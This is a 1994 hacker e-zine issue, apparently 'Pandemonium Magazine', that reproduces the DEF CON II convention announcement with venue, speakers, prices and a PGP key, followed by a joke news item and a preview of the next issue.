Groups, CypherPunks, Futurists, etc..
WHO: You know who you are, you shady characters.
WHAT: A convention for you to meet, party, and listen to some speeches that
you would normally never hear.
WHEN: July 22, 23, 24 - 1994
WHERE: Las Vegas, Nevada @ The Sahara Hotel
So you heard about DEF CON I, and want to hit part ][? You heard about the
parties, the info discussed, the bizarre atmosphere of Las Vegas and want to
check it out in person? Load up your laptop muffy, we're heading to Vegas!
Here is what Three out of Three people said about last years convention:
"DEF CON I, last week in Las Vegas, was both the strangest and the best
computer event I have attended in years." -- Robert X. Cringely, Info World
"Toto, I don't think we're at COMDEX anymore." -- Coderipper, Gray Areas
"Soon we were at the hotel going through the spoils: fax sheets, catalogs,
bits of torn paper, a few McDonald's Dino-Meals and lots of coffee grounds.
The documents disappeared in seconds." -- Gillian Newson, New Media Magazine
DESCRIPTION:
Last year we held DEF CON I, which went over great, and this year we are
planning on being bigger and better. We have expanded the number of speakers
to included midnight tech talks and additional speaking on Sunday. We attempt
to bring the underground into contact with "legitimate" speakers. Sure it's
great to meet and party with fellow hackers, but besides that we try to
provide information and speakers in a forum that can't be found at other
conferences.
WHAT'S NEW THIS YEAR:
This year will be much larger and more organized than last year. We have a
much larger meeting area, and have better name recognition. Because of this
we will have more speakers on broader topics, we plan on having a slip
connection with multiple terminals and an IRC connection provided by
cyberspace.com. We are trying to arrange a VR demo of some sort. Dr. Ludwig
will present this years virus creation award. There will be door prizes, and
as usual a bigger and better "Spot The Fed" contest. We'll try to get an
interesting video or two for people to watch. If you have any cool footage
you want shown, email me with more information.
WHO IS SPEAKING:
We are still lining up speakers, but we have several people who have expressed
interest in speaking, including Dr. Mark Ludwig (Little Black Book Of Computer
Viruses), Phillip Zimmerman (PGP), Loyd Blankenship (Steve Jackson Games),
Ken Phillips (Meta Information), and Jackal (Radio) to name a few. We are
still contacting various groups and individuals, and don't want to say
anything until we are as sure as we can be. If you think you are interested
in speaking on a self selected topic, please contact me. As the speaking
list is completed there will be another announcement letting people know who
is expected to talk, and on what topic.
WHERE THIS THING IS:
It's in Las Vegas, the town that never sleeps. Really. There are no clocks
anywhere in an attempt to lull you into believing the day never ends. Talk
about virtual reality, this place fits the bill with no clunky hardware. If
you have a buzz you may never know the difference. It will be at the Sahara
Hotel. Intel as follows:
The Sahara Hotel 1.800.634.6078
Room Rates: Single/Double $55, Suite $120 (Usually $200) + 8% tax
Transportation: Shuttles from the airport for cheap
NOTES: Please make it clear you are registering for the DEF CON ][
convention to get the room rates. Our convention space price is
based on how many people register. Register under a false name if
it makes you feel better, 'cuz the more that register the better for
my pocket book. No one under 21 can rent a room by themselves, so
get your buddy who is 21 to rent for you and crash out. Don't let
the hotel people get their hands on your baggage, or there is a
mandatory $3 group baggage fee. Vegas has killer unions.
COST:
Cost is whatever you pay for a hotel room split however many ways, plus
$15 if you preregister, or $30 at the door. This gets you a nifty 24 bit
color name tag (We're gonna make it niftier this year) and your foot in the
door. There are fast food places all over, and there is alcohol all over
the place, the trick is to get it during a happy hour for maximum cheapness.
FOR MORE INFORMATION:
For InterNet users, there is a DEF CON anonymous ftp site at
cyberspace.com in /pub/defcon. There are digitized pictures, digitized
speeches and text files with the latest up to date info available.
For email users, you can email dtangent@defcon.org for more information.
For Snail Mail send to DEF CON, 2702 E. Madison Street, Seattle, WA, 99207
For Voice Mail and maybe a human, 0-700-TANGENT on an AT&T phone.
A DEF CON Mailing list is maintained, and the latest announcements are mailed
automatically to you. If you wish to be added to the list just send
email to dtangent@defcon.org. We also maintain a chat mailing list where
people can talk to one another and plan rides, talk, whatever. If you request
to be on this list your email address will be shown to everyone, just so you
are aware.
STUFF TO SPEND YOUR MONEY ON:
> Tapes of last years speakers (four 90 minute tapes) are available for $20
> DEF CON I tee-shirts (white, large only) with large color logo on the front,
and on the back the Fourth Amendment, past and present. This is shirt v 1.1
with no type-o's. These are $20, and sweatshirts are $25.
> Pre-Register for next year in advance for $15 and save half.
> Make all checks/money orders/etc. out to DEF CON, and mail to the address
above.
If you have any confidential info to send, use this PGP key to encrypt:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3
mQCrAiyI6OcAAAEE8Mh1YApQOOfCZ8YGQ9BxrRNMbK8rP8xpFCm4W7S6Nqu4Uhpo
dLfIfb/kEWDyLreM6ers4eEP6odZALTRvFdsoBGeAx0LUrbFhImxqtRsejMufWNf
uZ9PtGD1yEtxwqh4CxxC8glNA9AFXBpjgAZ7eFvtOREYjYO6TH9sOdZSa8ahW7YQ
hXatVxhlQqve99fY2J83D5z35rGddDV5azd9AAUTtCZUaGUgRGFyayBUYW5nZW50
IDxkdGFuZ2VudEBkZWZjb24ub3JnPg==
=ko7s
-----END PGP PUBLIC KEY BLOCK-----
I'm sure I am forgetting a bunch of stuff that will be fixed in future
announcements. This files serves as the initial announcement so you
can make your plans accordingly.
- The Dark Tangent
_______________________________________________________________________
-----------------------------------------------------------------------
NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS
Today in the news, 4 hacker types were found sifting through the
garbage of a local phone company. A patrolling officer was on his
normal route when he happened upon the unsuspecting youths. When
questioned what they were expecting to find, they simply replied
'We were looking for food, officer'.
NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS NEWS
_______________________________________________________________________
-----------------------------------------------------------------------
Next Issue: DEFCON II - The Experience
Encryption Part II - How to Break the code
Fuck IT, We'll Have it all DAMMIT!
For those interested in using Internet and/or already got themselves an
account, be sure to look out for our release of the Internet Chronicles.
We will be covering the basics, as well as how to set up PCUCP, and your
very own FSP client. Likewise, for those not lucky enough to have their own
account we will be covering how to do so, and where to start.
_______________________________________________________________________
-----------------------------------------------------------------------
This Concludes the first release of Pandemonium Magazine. Thanks to all
who helped support the magazine and be sure to notify me at the following
number if you wish to help contribute to our cause. Likewise give it a
call if you wish to share your views with your fellow hobbyist.
Paradigm [Spectre Coordinator]
The AfterMath - Spectre/Pandemonium Mag WHQ - [206]230-0424
- [206]230-0490
_______________________________________________________________________
-----------------------------------------------------------------------
